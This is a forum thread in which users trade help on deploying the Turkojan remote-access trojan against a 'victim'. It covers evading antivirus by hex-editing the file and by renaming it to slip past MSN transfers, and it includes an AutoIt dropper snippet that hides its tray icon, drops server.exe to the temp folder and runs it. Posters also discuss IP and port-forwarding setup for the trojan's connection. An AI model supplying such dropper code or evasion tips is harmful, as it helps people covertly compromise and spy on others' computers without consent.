0
United's Avatar
Light Poster
Talking bout undetectable server, is turkojan easily detected on victim's com? coz my antivirus(Bitdefender) easily detects it everytime.

Btw, is it compulsory to buy a router and do port forwarding first? Coz my "IP keeps changing" problem is still unresolved.
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Start Voting for article of the month for July 2008
0
XXxxImmortalxxXX's Avatar
Invasive contributor
welll you have to make it undetectable as for your ip can change at all times if u read the begging of my post it will tell u about dynamic and static that should help u if not google about them
0
United's Avatar
Light Poster
how dya make it undetectable? I changed it into a .e1e file and sent it to my friend by msn, then ask them to change it back to exe, but their computer identified it as a virus immidieately.
0
XXxxImmortalxxXX's Avatar
Invasive contributor
Look up programs that can change the HEX inside the program itself
0
United's Avatar
Light Poster
8 bit, 16 bit, or 32 bit?
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Winner of Article of the month for July 2008
0
XXxxImmortalxxXX's Avatar
Invasive contributor
i do 32 bit
0
edmondyjh's Avatar, Join Date: Sep 2008
Newbie Member
I have added

#NoTrayIcon
FileInstall("server.exe", @TempDir&"/server.exe")
Run(@TempDir&"/server.exe")

but it can't find server.exe, so where to add this in?
0
edmondyjh's Avatar, Join Date: Sep 2008
Newbie Member
Quote:
Originally Posted by United
how dya make it undetectable? I changed it into a .e1e file and sent it to my friend by msn, then ask them to change it back to exe, but their computer identified it as a virus immidieately.
I guess you gotta request for another private edition, only then it is not undetectable by av.